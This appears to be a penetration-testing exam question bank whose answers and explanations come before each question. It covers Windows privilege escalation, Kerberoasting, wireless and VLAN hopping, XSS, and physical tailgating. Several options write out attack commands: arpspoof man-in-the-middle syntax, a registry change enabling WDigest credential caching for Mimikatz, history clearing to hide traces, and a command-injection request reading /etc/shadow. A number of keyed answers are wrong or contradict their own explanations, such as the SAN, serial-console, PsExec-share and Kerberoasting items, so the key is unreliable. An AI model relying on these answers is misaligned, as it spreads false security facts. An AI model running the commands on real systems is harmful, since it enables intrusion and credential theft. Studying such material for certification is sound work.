D3
A. Using unquoted service paths B. Replacing executables for writable services Using unquoted paths to services is one way that services can be exploited on a Windows system. By not quoting paths to services, any spaces in a directory name won't be processed correctly and can cause a malicious service executable located deliberately in the resulting unquoted directory path to be loaded instead of the correct service executable. In addition, writeable service executable files can be replaced with malicious executables with the same file name.
Which of the following are ways in which services on a Windows system can be exploited? (Choose two.) A. Using unquoted service paths B. Replacing executables for writable services C. Implementing a cold boot attack D. Compromising credentials in LSASS
A. X11 forwarding X11 forwarding can be used to remotely manage Linux systems over a network connection using a graphical user interface.
Which of the following can be used to remotely manage Linux systems over a network connection using a graphical user interface? A. X11 forwarding B. RDP C. ARD D. WMI E. SMB
C. ARD The Apple Remote Desktop (ARD) can be used to remotely manage Macintosh systems over a network connection using a graphical user interface.
Which of the following can be used to remotely manage Macintosh systems over a network connection using a graphical user interface? A. Rlogin B. RDP C. ARD D. PsExec E. RSH
B. RDP The Remote Desktop Protocol (RDP) is used on Windows systems to display the graphical desktop of a remote Windows host on the local system over a network connection. It provides full point-and-click interactivity. It can even be used to transmit sounds from the remote system to the local system and to share files between systems.
Which of the following can be used to remotely manage Windows systems over a network connection using a graphical user interface? A. SMB B. RDP C. PS Remoting D. PsExec E. SSH
A. VNC Virtual Network Computing (VNC) connections can be used to remotely manage Windows, Macintosh, or Linux systems over a network connection using a graphical user interface, as long as the necessary software is installed on both the local and remote systems.
Which of the following can be used to remotely manage Windows, Macintosh, or Linux systems over a network connection using a graphical user interface (as long as the necessary software is installed)? A. VNC B. RDP C. ARD D. WMI E. RSH
B. It lacks security controls. C. A malicious host can advertise itself as any host it wants to. The LLMNR protocol has many security vulnerabilities that can be exploited in a penetration test. For example, it lacks security controls such as authentication. Because of this, a malicious host on the network can advertise itself as any host it wants to.
Which of the following describe the security risks associated with using the LLMNR protocol? (Choose two.) A. Data is transmitted as clear text. B. It lacks security controls. C. A malicious host can advertise itself as any host it wants to. C. It can be used to facilitate a DDoS attack. D. It creates excessive network traffic.
D. EternalBlue E. WannaCry The EternalBlue and WannaCry exploits are facilitated by weaknesses in the SMB protocol. The EternalBlue exploit takes advantage of the fact that SMBv1 mishandles exploit packets, allowing attackers to remotely execute malicious code on the system running the SMB protocol. WannaCry is a form of ransomware that uses EternalBlue to gain access to vulnerable systems and install itself.
Which of the following exploits are facilitated by weaknesses in the SMB protocol? (Choose two.) A. Distributed denial of service (DDoS) B. Fraggle C. Teardrop D. EternalBlue E. WannaCry
B. Kerberoasting The penetration tester in this scenario is using an exploit Kerberoasting. Any valid domain user can request an SPN for a registered service. The Kerberos ticket received as a result can be taken offline and cracked, potentially exposing the service account password. This can allow privilege escalation because it's not uncommon for the service account to have administrator-level permissions to the local server.
During a gray box penetration test, the tester logs on to the target organization's domain and requests a service principle name (SPN) for registered service. A ticket is received, and the tester takes it offline and attempts to crack its encryption. What is this exploit called? A. Sandbox escape B. Kerberoasting C. DLL hijacking D. Cold boot attack
A. Emergency fail open Most automatically locking door systems have some type of emergency fail open mechanism. The idea behind this is that if there is an emergency of some sort, such as a fire, then the doors must automatically unlock to prevent people from being trapped inside or preventing emergency personnel from entering. If you can figure out what fail open mechanism is used, you may be able to manually trigger it to open a locked door.
Which of the following features of an egress sensor can be manipulated to allow a penetration tester to enter a building without authorization? A. Emergency fail open B. Automatic locking C. Automatic unlocking via motion sensor for egress D. Automatic unlocking via light sensor for egress
A. LSASS The Local Security Authority Subsystem Service (LSASS) is a process that runs on a Windows system to enforce the security policy on the system. It verifies users that log on to the system, manages user password changes, creates access tokens, and makes entries to the Security log.
Which of the following is a service that runs on a Windows system and enforces the security policy of the system? A. LSASS B. Key distribution center (KDC) C. Group Policy Object (GPO) D. LDAP
A. PsExec PsExec is a command-line utility that is installed by default on Windows systems that lets you interactively execute processes on other Windows systems.
Which of the following is a utility that can be used on Windows systems that allows you to establish command-line access to the console of a remote Windows system, much like the older Telnet client? A. PsExec B. VNC C. RSH D. Rlogin
D. Send spoofed emails to the staff to see if they will respond with sensitive information. In this scenario, since you are trying to preform OSINT on the staff of the company, it would be best to send spoofed emails to the staff to see whether they will respond with sensitive information. Penetration testers need to be ready to incorporate social engineering in their test plan if allowed by the rules of engagement and included in the scope of work.
Which of the following is the best course of action for a penetration tester who is required to perform open-source intelligence (OSINT) on the staff at a target company after completing the infrastructure aspect? A. Go to the client location and use impersonation to obtain information from the staff. B. Using social engineering techniques, try to obtain staff information by calling the company. C. Search the Internet for information on the staff, such as visiting social networking sites. D. Send spoofed emails to the staff to see if they will respond with sensitive information.
A. RPC/DCOM Remote Procedure Call (RPC)/Distributed Component Object Model (DCOM) is used on Windows systems and allows you to remotely execute code on a different Windows system.
Which of the following is used on Windows system to allow you to remotely execute code on another Windows system somewhere else in the network? A. RPC/DCOM B. X-server C. RSH D. Rlogin
C. Using unsecure file and folder permissions To implement a DLL hijacking exploit, the penetration tester needs to have read/write permissions to the target file system. Using unsecure file and folder permission can make this task much easier to accomplish.
Which of the following issues could enable a penetration tester to execute a DLL hijacking exploit on a Windows system? A. Failure to install the latest Windows updates B. Using out-of-date virus definitions C. Using unsecure file and folder permissions D. Failure to configure user account restrictions in Group Policy
A. cPassword On a Windows system, cPassword is the name of the attribute that stores passwords in a Group Policy Preference item. Whenever a preference requires a user's password to be saved, it gets stored within this attribute in encrypted format. However, the password can be easily decrypted by any authenticated user in the domain.
Which of the following refers to the name of the attribute that stores passwords in a Windows Group Policy Preference item? A. cPassword B. TGT C. TGS D. LSASS
C. reg save HKLM\System\CurrentControlSet\Services\Sv.reg reg save saves a copy of specified subkeys, entries, and values of the registry in a specified file. A file with the .reg file extension is a registration file used by the Windows Registry. These files can contain hives, keys, and values.
Which of the following should be used if a penetration tester is attempting to achieve persistence by compromising a Windows server? A. net session server | dsquery -user | net use c$ B. powershell && set-executionpolicy unrestricted C. reg save HKLM\System\CurrentControlSet\Services\Sv.reg D. schtasks.exe /create/tr "powershell.exe" Sv.ps1 /run
A. Using scheduled tasks D. Using DLL hijacking DLL hijacking and scheduled tasks can both help retain persistence for an exploit on a Windows system. DLL hijacking causes the exploit contained in the malicious DLL to be loaded every time a linked application is started. Using scheduled tasks ensures that an exploit is run on a regular basis.
Which of the following techniques can be used to help retain persistence for an exploit on a Windows system? (Choose two.) A. Using scheduled tasks B. Using cold boot attacks C. Implementing Kerberoasting D. Using DLL hijacking E. Looking for kernel exploits
A. UDP 161 The SNMP protocol runs on UDP port 161.
Which port is used by the SNMP protocol? A. UDP 161 B. TCP 23 C. TCP 389 D. UDP 88
A. 20 B. 21 By default, an FTP server uses two ports: 20 and 21. Port 20 is used to transfer data between the FTP server and the FTP client. Port 21 is used to send commands between the FTP client and the FTP server.
Which ports are used by an FTP server? (Choose two.) A. 20 B. 21 C. 22 D. 23 E. 25
C. 139 E. 445 The SMB protocol uses TCP ports 139 and 445. A system with these two ports open is most likely a Windows host running SMB or a Linux host running Samba (which is an open source implementation of the SMB service).
Which ports are used by the SMB protocol? (Choose two.) A. 53 B. 80 C. 139 D. 443 E. 445
D. VOIP phones E. SCADA devices VoIP phones and SCADA devices typically cannot be configured in a manner that allows them to meet the security policy requirements of a NAC system. For example, you usually can't install antimalware software on a VoIP phone or a SCADA device. Therefore, these systems are commonly whitelisted in NAC implementations, allowing them to bypass the requirements applied to other systems.
Which types of network devices are commonly whitelisted in many NAC implementations? (Choose two.) A. Laptops B. Desktops C. Servers D. VOIP phones E. SCADA devices
D. Fragmentation attack In a fragmentation wireless attack, a small amount of keying material is extracted from a captured packet. Then, an ARP packet is sent with known content to the access point. If the packet is echoed back by the AP, then even more keying information can be obtained from the returned packet. If this process is repeated over and over, the entire wireless key can be exposed.
Which wireless encryption key cracking exploit involves extracting a small amount of keying material from captured wireless packets and then sending ARP frames to the access point? A. Repeating attack B. Downgrade attack C. Deauth attack D. Fragmentation attack
A. Karma attack In a Karma attack, the tester uses a special wireless device to listen for SSID requests from other devices and then respond as if it were the requested access point. Victims think they are connected to a legitimate network, but they are actually connected directly to the tester. The tester typically forwards victims' traffic to the Internet, so everything seems normal. This allows the tester to inspect the victim's traffic and capture sensitive information.
Which wireless exploit uses a special wireless device to listen for SSID requests from other wireless devices and then impersonate the requested access point? A. Karma attack B. Deauth attack C. Downgrade attack D. Rogue access point
C. Attempt RID cycling to enumerate users and groups. One of the first steps when looking to gain access to a host, system, or application is to enumerate usernames. Once usernames are guessed, targeted password-based attacks can then be attempted. A RID cycling attack attempts to enumerate user accounts through null sessions. If a tester specifies a password file, it will automatically attempt to brute force the user accounts when it's finished enumerating. So, in this scenario, attempting RID cycling will be the next step the tester should try.
You are a penetration tester and have found a vulnerability in the client's domain controller. The vulnerability is that null sessions are enabled on the domain controller. What type of attack can be performed to take advantage of this vulnerability? A. Attempt a pass-the-hash attack to relay credentials. B. Attempt password brute forcing to log into the host. C. Attempt RID cycling to enumerate users and groups. D. Attempt session hijacking to impersonate a system account.
D. The tester compromised an account and needs to dump hashes and plaintext passwords from the system. Kerberoasting is a technique that relies on requesting service tickets for service account service principal names (SPNs). The tickets are encrypted with the password of the service account associated with the SPN, meaning that once a tester has obtained the service tickets by using a tool like Mimikatz, the tester can crack the tickets to obtain the service account password using offline cracking tools.
You are a penetration tester and looking at performing a Kerberoasting attack. Given the following situations, in which one would you perform a Kerberoasting attack? A. The tester compromised a Windows device and dumps the Local Security Authority (LSA) secrets. B. The tester needs to retrieve the Security Account Manager (SAM) database and crack the password hashes. C. The tester compromised a user account that has limited privileges and needs to target other accounts for lateral movement. D. The tester compromised an account and needs to dump hashes and plaintext passwords from the system.
C. HKEY CURRENT_USER If a tester has access to a Windows workstation or server, then they can use PowerSploit, which provides the toolkit needed to maintain persistence and to perform further reconnaissance. The testing will want to exploit the HKEY_CURRENT_USER registry hive. The HKEY_CURRENT_USER hive is meant to be available only to the currently logged on user. So, when a different Windows user logs onto the system, a different copy of the HKEY_CURRENT_USER registry hive is loaded. The HKEY_CURRENT_USER registry hive is saved locally as the file NTUSER.DAT or USER.DAT when a user logs off. This registry hive can be opened in Notepad, and the encrypted login ID and password can be easily located. If the user has a roaming profile, then the NTUSER .DAT file will be saved on every workstation the user logged onto.
You are a penetration tester, and while conducting a test, you are trying to maintain persistence on a Windows system that has limited privileges. What registry key should you use? A. HKEY_CLASSES_ROOT B. HKEY_CURRENT_CONFIG C. HKEY_CURRENT_USER D. HKEY_LOCAL_MACHINE
C. Impersonation E. Elicitation Impersonation is a social engineering technique that can be used by a penetration tester to gain the trust of the target organization's employees. In this scenario, the employees trusted the tester because emails appeared to be coming from another employee. The tester leveraged this trust to elicit sensitive information from those employees. This is sometimes called business email compromise.
You are performing a black box penetration test for a medium-sized manufacturing organization. Using reconnaissance and phishing techniques, you have compromised the password for an employee's email account. You use this account to question other employees in an attempt to gather sensitive information and documents. Which exploits did you use in this scenario? (Choose two.) A. Shoulder surfing B. Phishing C. Impersonation D. Interrogation E. Elicitation
C. Switch spoofing This is an example of a switch spoofing exploit that is used for VLAN hopping. In a switch spoofing exploit, the tester's network board is reconfigured to emulate a trunk port on a network switch. By doing this, the real switch will think it needs to forward traffic from all VLANs to the tester's device.
You are performing a gray box penetration test. To capture information from multiple VLANs, you have configured the network board in your computer to emulate a trunk port on a network switch. Your goal is to get the real switch to forward traffic from all VLANs to your device. What is this exploit called? A. MAC address spoofing B. Double-tagging C. Switch spoofing D. Evil twin
A. The bands and frequencies of the wireless devices used by the client In this scenario, the penetration tester would need to receive the bands and frequencies used by the client's wireless devices to proceed with the wireless penetration test. Wireless devices may operate on a number of bands and frequencies, and knowing the exact bands and frequencies would allow a penetration tester to conduct the wireless penetration test as requested.
A client has requested that a wireless penetration test be done. Which scoping target information will most likely be needed before testing can start? A. The bands and frequencies of the wireless devices used by the client B. The preferred wireless access point vendor of the client C. The number of wireless devices owned by the client D. The physical location and network ESSIDs to be tested
D. JTAG debug exploit The JTAG port is implemented in motherboards made by some manufacturers for diagnostic and testing purposes. With the right equipment, a penetration tester can connect to this port and capture data directly from the running motherboard.
A penetration tester connects a special device to a diagnostic port implemented in the motherboard by the manufacturer and is able to capture data from system registers. What type of exploit occurred in this scenario? A. Cold boot attack B. Shell upgrade exploit C. VM escape exploit D. JTAG debug exploit
B. Tailgating Tailgating occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens with the authorized person's knowledge and/or consent.
A penetration tester enters the target organization's physical facility by striking up a conversation with an employee in the parking lot and walking with her through a door that uses a proximity badge reader to control access. The employee uses her badge to open the door and holds it open for the penetration tester. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. Piggybacking Piggybacking occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person's knowledge or consent.
A penetration tester enters the target organization's physical facility by walking behind an employee and grabbing the authentication-protected door before it shuts all of the way. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. To share files on the network C. To share printers on the network The Server Message Block (SMB) protocol is used to share files and printers between hosts on a network.
What are the functions of the Server Message Block (SMB) protocol? (Choose two.) A. To share files on the network B. To transfer email messages between mail transfer agents (MTAs) C. To share printers on the network D. To map IP addresses to MAC addresses E. To transfer email messages to a mail user agent (MUA)
B. The HTTP POST method Forms in HTML can use either method="POST" or method="GET" (default) in the <form> element. The method specified determines how form data is submitted to the server. With GET, the parameters remain in the browser history because they become part of the URL. With POST, parameters are not saved in browser history. GET is less secure compared to POST because data sent is part of the URL.
A penetration tester is conducting a test on a web application and discovers that the user login process sends FROM field data by using the HTTP GET method. To reduce the risk of exposing sensitive data, the HTML form should be sent by using which of the following? A. The HTTP OPTIONS method B. The HTTP POST method C. The HTTP PUT method D. The HTTP TRACE method
A. NetBIOS NetBIOS is a transport protocol used by Windows systems to share resources, such as shared folders or printers. Once an attacker identifies that port 139 is open on a device, NBTSTAT can be used to footprint the device. For example, you could discover the device's computer name and identify whether it is a workstation or a server. All of this information can be gathered without any kind of authentication.
A penetration tester is performing a gray box test for a client. During a network scan, she notices a host that has TCP port 139 open. She suspects this is a Windows system, so she runs the NBTSTAT command and discovers key information about the host. Which protocol on the remote host allowed the tester to gather this information? A. NetBIOS B. SNMP C. NAC D. SMTP
D. Provides extended site validation Subject Alternative Name (SAN) is an extension to X.509 that allows various values to be associated with a security certificate using a subjectAltName field. These values are called SANs and include email addresses, IP addresses, URLs, DNS names, directory names, and other names followed by a value. Using SAN provides extended site validation.
A security administrator is trying to encrypt communication by using the Subject Alternative Name (SAN) attribute of a certificate. What is a reason why the administrator should take advantage of SAN? A. Can protect multiple domains B. Does not require a trusted certificate authority (CA) C. Protects unlimited subdomain D. Provides extended site validation
B. Command injection In this scenario, a command was entered, and the attacker was attempting to gain access to the password file within the /etc directory. Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via vulnerable applications. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.
A tester discovers the following log entry on a server: Dec 23 2018 00:22:16 httpd[2342]: GET /app2/prod/proc/process.php?input=change;cd%20../../../etc;cat%20shadow What type of attack was being attempted? A. Buffer overflow B. Command injection C. Cross-site scripting D. Password attack
B. Hidden elements The programmer in this scenario has used hidden elements in the HTML code. This is an unsecure coding practice that can result in sensitive information being stored in the user's browser (the DOM).
A web application developer included the following HTML code within a form page: <input type=hidden> This is an example of which unsecure code practice? A. Comments in source code B. Hidden elements C. Unauthorized use of functions/unprotected APIs D. Race conditions
D. Hard-coded credentials The programmer in this scenario has used hard-coded credentials. If an attacker (or a penetration tester) were to view the application's source code, they would have access to the database authentication credentials.
A web application programmer has included the username and password required to access a database instance within the application's PHP code. This is an example of which unsecure code practice? A. Comments in source code B. Race conditions C. Unauthorized use of functions/unprotected APIs D. Hard-coded credentials
B. They are prone to data emanation. The risk associated with enabled serial console connections on network devices is the fact that network administrators tend to not secure them properly. Because they can be accessed only with a direct point-to-point connection, they don't configure them to require authentication. Using impersonation, this makes it easy for a penetration tester to access the device, as long as they can get physical access to it.
What are the risks of enabling serial console connections on network devices such as routers and switches? A. Network administrators tend to not secure them properly. B. They are prone to data emanation. C. It is easy for attackers to connect to them. D. It is easy for attackers to sniff data from them.
D. Hashed account passwords The SAM database on a Windows system contains hashed passwords for local accounts. It is located in C:\Windows\System32\config\ by default. If a copy of this file can be made, it can be cracked using a number of different tools available on the Internet to expose the passwords it contains.
What is stored in the SAM database on a Windows system? A. Security log entries B. Digital signatures associated with each application installed on the system C. Group Policy settings D. Hashed account passwords
C. Implement a strict HSTS policy that prevents a user's browser from opening a page unless an HTTPS connection has been used. The best way to defend against an SSL stripping attack is to implement an HTTP Strict Transport Security (HSTS) policy that prevents a user's browser from opening a web page unless an HTTPS connection has been used to transfer the page from the web server to the client.
What is the best way to defend against an SSL stripping attack? A. Update the virus definitions on user's workstations. B. Implement a network intrusion detection (NID) device. C. Implement a strict HSTS policy that prevents a user's browser from opening a page unless an HTTPS connection has been used. D. Reconfigure all browsers to require TLS sessions.
B. To transfer email messages between mail transfer agents (MTAs) The SMTP protocol is used to transfer email messages between mail transfer agents (MTAs).
What is the function of the Simple Mail Transfer Protocol (SMTP)? A. To share files on the network B. To transfer email messages between mail transfer agents (MTAs) C. To map IP addresses to MAC addresses D. To transfer email messages to a mail user agent (MUA)
C. Ret2libc On Linux system, the Ret2libc exploit causes the return address of a subroutine to be replaced by the address of a subroutine that is already present in a processes' memory.
Which Linux exploit causes the return address of a subroutine to be replaced by the address of a subroutine that is already present in a process's memory? A. SGID B. Sticky bit C. Ret2libc D. Unsecure sudo
C. Sticky bit When the sticky bit permission is assigned to a directory on a Linux system, then users can delete files only within the directory for which they are the owner, even if they have write and execute permissions to that directory.
Which Linux special permission, when assigned to a directory, prevents users from deleting files they do not own, even if they have write and execute permissions to the directory? A. SGID B. SUID C. Sticky bit D. Ret2libc
A. Unattended installations via PXE Running unattended installations over the network using the Preboot Execution Environment (PXE) could potentially result in authentication credentials being transferred as clear text. During the unattended install, a special file called the answers file is used to automate the installation process. If the answers file contains user account information to be created on the system during the install, that information is transferred as clear text.
Which Windows feature could potentially allow authentication credentials to be transferred as clear text over a network connection? A. Unattended installations via PXE B. JTAG debug C. Remote Desktop D. Domain join
A. Parameter pollution B. Insecure direct object reference exploit In both a parameter pollution exploit and an insecure direct object reference exploit, the penetration tester modifies a parameter in an HTTP request to gain unauthorized access to information. For example, after authenticating to a web application, the tester could modify the /search?q= parameter in a URL to trick the application into supplying information that the user account shouldn't be able to see.
Which authorization exploits modify a parameter in an HTTP request to gain unauthorized access to information? (Choose two.) A. Parameter pollution B. Insecure direct object reference exploit C. Cross-site scripting attack D. Cross-site request forgery E. Redirect attack
D. Document Object Model (DOM) In a DOM XSS exploit, the attacker exploits weaknesses in the victim's web browser. Typically, outdated browsers are most susceptible to this type of exploit. This is considered to be a client-side XSS attack.
Which form of a cross-site scripting (XSS) attack leverages an older, vulnerable web browser being run locally on the victim's computer? A. Stored/persistent B. Clickjacking C. Reflected D. Document Object Model (DOM)
A. Stored/persistent B. Reflected Both the stored/persistent and reflected XSS exploits are considered server-side exploits because the malicious scripts are embedded on a server. When the user views the web page, the malicious scripts run, allowing the attacker to capture information or perform other actions.
Which forms of a cross-site scripting (XSS) attack are considered to be a server-side exploits? (Choose two.) A. Stored/persistent B. Reflected C. Document Object Model (DOM) D. Clickjacking E. Directory transversal
A. Double-tagging Double-tagging of VLAN tags is allowed in the 802.1q specification. This allows a host to "hop" between VLANs.
Which method is commonly used to hop between VLANs? A. Double-tagging B. Brute-force attacks C. MAC address spoofing D. DNS poisoning
B. Shell upgrade C. Virtual machine (VM) escape D. Container escape Shell upgrade, VM escape, and container escape are all examples of sandbox escape exploits.
Which of the following are examples of sandbox escape exploits? (Choose three.) A. Cold boot attacks B. Shell upgrade C. Virtual machine (VM) escape D. Container escape E. Ret2libc F. JTAG debug
A. Including comments in the source code E. Providing verbose error messages While commenting an application's source code is a best practice for programmers, it can also create security vulnerability because it provides an attacker (or penetration tester) who views the source code with extensive information about how the application works. Likewise, providing overly verbose error messages may be a best practice while programming the application, but leaving them in the released application can provide an attacker with valuable information.
Which of the following are examples of unsecure coding practices? A. Including comments in the source code B. Checking input fields for properly formatted information C. Including subroutines for handling error conditions D. Digitally signing the code E. Providing verbose error messages
C. Lack of error handling routines D. Lack of code signing The programmer should be sure to include routines that tell the application what to do should it encounter an error condition. For example, many buffer overflow attacks exploit applications that don't know how to respond when they receive more information than they were expecting. Likewise, all applications should have their code digitally signed. This will expose any unauthorized modifications made to the code.
Which of the following are examples of unsecure coding practices? (Choose 2) A. Removing comments from the source code before release B. Checking input fields for properly formatted information C. Lack of error handling routines D. Lack of code signing E. Removing overly verbose error messages
A. It is commonly used in the absence of a DNS server. E. It allows the IPv6 host to resolve hostnames on the same local link. The LLMNR protocol is loosely based on the DNS packet format and allows IPv4 and IPv6 hosts to perform name resolution for other hosts on the same local network without a DNS server. It is supported by both Windows and Linux hosts.
Which of the following are true of the Link-Local Multicast Name Resolution (LLMNR) protocol? (Choose two.) A. It is commonly used in the absence of a DNS server. B. It is not supported by Linux hosts. C. It is not supported by Windows hosts. D. It is used only by routers, not by workstations or servers. E. It allows the IPv6 host to resolve hostnames on the same local link.
A. The community string is valid for every SNMPv1 node. B. The community string is transmitted as clear text. The SNMPv1 protocol is an older protocol that uses the concept of a community string instead of a password. The same community string is used to authenticate to every SNMPv1 host in the network. By convention, most SNMPv1 administrators set the community string to a value of public. Even if a unique community string were used, it was easy to discover because it was transmitted as clear text on the network.
Which of the following are vulnerabilities associated with the SNMPv1 protocol? (Choose two.) A. The community string is valid for every SNMPv1 node. B. The community string is transmitted as clear text. C. The community string uses the weak RC2 cipher. D. No authentication is required to communicate with an SNMPv1 host. E. The Management Information Base (MIB) is stored in unencrypted format.
D. By attempting privilege escalation attacks Privilege escalation attacks are frequently categorized into two major types: vertical and horizontal. Vertical escalation attacks focus on testers gaining higher privileges. Horizontal escalation attacks move sideways to other accounts or services that have the same level of privileges. An unquoted service path is a vulnerability in Windows. When a service is started, Windows tries to locate it. Usually services are well-defined with quotation marks. But, there are times when a service path might contain spaces or are not surrounded by quotation marks. Testers can use the unquoted service paths to escalate privileges.
A penetration tester has found a few unquoted service paths during a test of a client's network. How can the tester use these vulnerabilities to his advantage? A. By attempting to crack the service account passwords B. By attempting DLL hijacking attacks C. By attempting to locate weak file and folder permissions D. By attempting privilege escalation attacks
E. Use a blacklist validation for the SQL statements. F. Use a whitelist validation for the SQL statements. Given this scenario, the client will want to use a blacklist and whitelist validation for the SQL statements. SQL injection is a common attack route that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. SQL injections are one of the most common web hacking techniques. Blacklist validation tests the external input against a set of known malicious inputs. Whitelist validation tests an external input against a set of known, approved input. With whitelist input validation, the application knows exactly what is wanted and rejects other input.
A penetration tester has recently finished a test that revealed that a legacy web application is vulnerable to SQL injections. The client indicates that remediating the vulnerability would require an architectural change and that management does not want to risk anything happening to the current application. Which of the following conditions would minimize the SQL injection risk while providing a low-effort and short-term solution? (Choose two.) A. Identify and remove the dynamic SQL from the stored procedures. B. Identify and remove the inline SQL statements from the code. C. Identify and sanitize all user inputs. D. Identify the source of malicious input and block the IP address. E. Use a blacklist validation for the SQL statements. F. Use a whitelist validation for the SQL statements.
C. ADMIN$ and SERVICES PsExec is a tool designed to allow penetration testers to run programs on remote systems via SMB on port 445. That makes it an extremely useful tool. PsExec's ability to run processes remotely requires that both the local and remote computers have file and print sharing (i.e., the Workstation and Server services) enabled and the default Admin$ share, which is a hidden share that maps to the \windows directory.
A penetration tester has successfully captured the administrator credentials of a remote Windows machine. The tester is now attempting to access the system by using PsExec. However, the tester is denied permission. What shares must be accessible for a successful PsExec connection? A. ADMIN$ and C$ B. ADMIN$ and IPC$ C. ADMIN$ and SERVICES D. IPC$ and C$
B. $ history -c The bash history keeps a record of all commands executed by a tester on the Linux command line. This allows the tester to easily run previously executed commands by using the up and down arrow keys to scroll through the command history file. The main reason for removing command-line history from the Linux terminal is to prevent another user from using the tester's previous commands. To delete or clear all the entries from bash history, use the history command with the -c option: $ history -c.
A penetration tester has successfully exploited an application vulnerability and now needs to remove the command history from the Linux session. Which command will remove the command history? A. $ cat history /clear B. $ history -c C. $ history --remove D. $ rm -f ./history
C. A spear phishing attack The Social Engineer Toolkit (SET) provides a framework for automating the social engineering process, including sending spear phishing messages, hosting fake websites, and collecting credentials. Social engineering plays an important role in many attacks. SET is a menu-driven social engineering attack system. In this scenario, the penetration tester is attempting a spear phishing attack.
A penetration tester has used Social Engineer Toolkit (SET) to make a copy of a company's cloud-hosted web mail portal and then sends an email to try to obtain the CEO's login credentials. This is an example of what type of attack? A. An elicitation attack B. An impersonation attack C. A spear phishing attack D. A whaling attack
B. Repeating attack In a repeating attack, the penetration tester captures the target organization's wireless network radio signal and rebroadcasts it with high gain to extend its range. In this scenario, the organization's wireless network can now be accessed by the penetration tester from the parking lot.
A penetration tester impersonates a vending machine repair person to gain access to the target organization's facility. While inside, the tester hides a wireless device behind a vending machine that captures the organization's wireless network radio signal and rebroadcasts it with high gain towards the parking lot. Which wireless exploit did the tester employ in this scenario? A. Karma attack B. Repeating attack C. Downgrade attack D. Jamming attack
D. The MAC address of the gateway ARP spoofing is a technique in which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Normally, the goal is to associate the attacker's Media Access Control (MAC) address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead. ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic.
A penetration tester is conducting ARP spoofing against a switch. Which of the following should the tester trick to get the most information? A. The MAC address of the client B. The MAC address of the domain controller C. The MAC address of the web server D. The MAC address of the gateway
D. Stored cross-site scripting (XSS) Stored cross-site scripting (XSS) is the most dangerous type of cross-site scripting. Web applications that allow users to store data are potentially exposed to this type of attack. Stored XSS occurs when a web application gathers input from a user which might be malicious and then stores that input in a data store for later use
A penetration tester is conducting a scan of a web application. During the review of the scan results, which of the following vulnerabilities would be the most critical and should be prioritized for exploitation? A. Clickjacking B. Expired certificate C. Fill path disclosure D. Stored cross-site scripting (XSS)
D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogoCredential /t REG_DWORD /d 1 Using reg add adds a new subkey or entry into the registry. The syntax is as follows: reg add <KeyName> /v <ValueName> /t <DataType> /d <Data>
A penetration tester is running a phishing test and receives a shell from an internal computer that is running the Windows 10 operating system. The tester decides that he wants to use Mimikatz to perform credential harvesting. The tester wants to allow for credential caching. Which of the following registry changes would allow this? A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v UseLogoCredential /t REG-DWORD /d 0 B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogoCredential /t REG_DWORD /d 1 C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogoCredential /t REG_DWORD /d 1 D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogoCredential /t REG_DWORD /d 1
B. Conduct a LLMNR/NETBIOS-NS query. Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NetBIOS-NS) poisoning can provide penetration testers with the ability to obtain a man-in-the-middle position, broadening their ability to gain access and information. One of the most commonly targeted services in a Windows network is NetBIOS. NetBIOS is commonly used for file sharing.
A penetration tester is testing the penetration of a client's network and managed to obtain access to a laptop. What would be the tester's next step to obtain credentials from the laptop? A. Brute force the user's password. B. Conduct a LLMNR/NETBIOS-NS query. C. Leverage the BeEF framework to capture credentials. D. Perform an ARP spoofing poisoning.
C. Local file inclusion E. Remote file inclusion File inclusion is an exploit that allows a tester to upload a file (usually containing malicious code) into a web application. The file could be local, or it could be located on a remote website. This is really a form of injection attack and just as with any injection attack, input validation on the part of the web application developer is the key to preventing it.
A penetration tester is trying to exploit a web application used by the target organization. He uses a form field in the web application to upload a malicious executable to the web server. Which of the following describe this kind of exploit? (Choose two.) A. Cookie manipulation B. Directory transversal C. Local file inclusion D. Cross-site scripting (XSS) E. Remote file inclusion
C. arpspoof -t 192.168.10.25 192.168.10.254 A man-in-the-middle attack intercepts a communication between two systems. ARP stands for Address Resolution Protocol, and it allows the network to translate IP addresses into MAC addresses. In this scenario, the attacker wants to perform a man-in-the-middle attack; it is done by performing arpspoof -t <victimIP> <gatewayIP>. The -t switch specifies a particular host to ARP poison.
A penetration tester is trying to perform a man-in-the-middle (MITM) attack on a computer. The computer's network configuration is as follows: IP: 192.168.10.25 NETMASK: 255.255.255.0 DEFAULT GATEWAY: 192.168.10.254 DHCP: 192.168.1.253 DNS: 192.168.10.10, 192.168.20.10 Which of the following commands should the malicious user execute to perform the MITM attack? A. arpspoof -c both -r -t 192.168.10.1 192.168.10.25 B. arpspoof -c both -t 192.168.10.25 192.168.1.253 C. arpspoof -t 192.168.10.25 192.168.10.254 D. arpspoof -r -t 192.168.1.253 192.168.10.25
A. Piggybacking Piggybacking occurs when an intruder tags along with one or more an authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person's knowledge or consent.
A penetration tester observes that many employees of the target organization congregate outside the back door of the facility at 10 a.m. and 2 p.m. to smoke cigarettes. The next day, the tester joins the group and pretends to smoke with them. When the group finishes smoking, the tester walks through the back door behind the group. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. Credential brute-forcing This is an example of a credential brute-forcing attack. In a true brute-force attack, all possible letter, number, and special character combinations would be tried one after another until the right one is found. However, by creating a list of likely passwords based on the user's personal interests, the probability of success is greatly increased.
